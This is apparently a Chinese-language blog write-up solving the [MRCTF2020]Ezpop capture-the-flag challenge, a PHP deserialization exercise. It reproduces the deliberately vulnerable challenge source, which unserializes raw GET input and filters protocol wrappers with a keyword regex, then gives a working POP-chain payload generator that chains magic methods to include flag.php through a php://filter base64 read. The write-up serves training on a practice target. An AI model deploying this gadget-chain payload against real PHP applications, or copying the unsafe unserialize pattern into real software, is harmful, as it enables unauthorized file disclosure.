[MRCTF2020]Ezpop 1

目录

漏洞类型

解题思路

解题流程

新知识点

题目地址

漏洞类型

PHP反序列化POP链

文件包含

解题思路

首先 预览代码,发现函数 unserialize 判断反序列化知识点,并且有多个类可能考察pop链

第一:获取 flag 存储 flag.php

第二:四个魔术方法__invoke__construct__toString__wakeup__get

第三:传输 pop参数数据后触发 __wakeup,对该类中的 this->source参数若为字符串则对其进行过滤,若source变量为一个类则触发__toString

第四:__toString 会调用this->str变量,当str变量为Test类的时候,将触发__get

第四:__get会return $function方法,当给Test类中的p变量赋值为Modifier类时候,会触发__invoke

第四:__invoke会执行append()方法,从而执行文件包含,注意var变量为protected类型,需要对变量进行base64编码

第五:涉及对象 Modifier,Show,Test,变量 op 及 var,source,str,p,进行构造输出

解题流程

源代码

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

构造代码

<?php
class Modifier {
    protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";

}

class Test{
    public $p;
}

class Show{
    public $source;
    public $str;
    public function __construct(){
        $this->str = new Test();
    }
}

$a = new Show();
$a->source = new Show();
$a->source->str->p = new Modifier();
echo urlencode(serialize($a));

新知识点

__construct 当一个对象创建时被调用,
__toString 当一个对象被当作一个字符串被调用。
__wakeup() 使用unserialize时触发
__get() 用于从不可访问的属性读取数据
#难以访问包括:(1)私有属性,(2)没有初始化的属性

__invoke() 当脚本尝试将对象调用为函数时触发。
->用来引用一个类的属性(变量)、方法(函数)

protected属性:在类的内部可以调用外部不能可以被继承并且重构

return $this后可以加多个变量

题目地址

https://buuoj.cn/challenges#[MRCTF2020]Ezpop

posted @ 2022-03-29 15:02  WeQi_Blog  阅读(258)  评论(0编辑  收藏  举报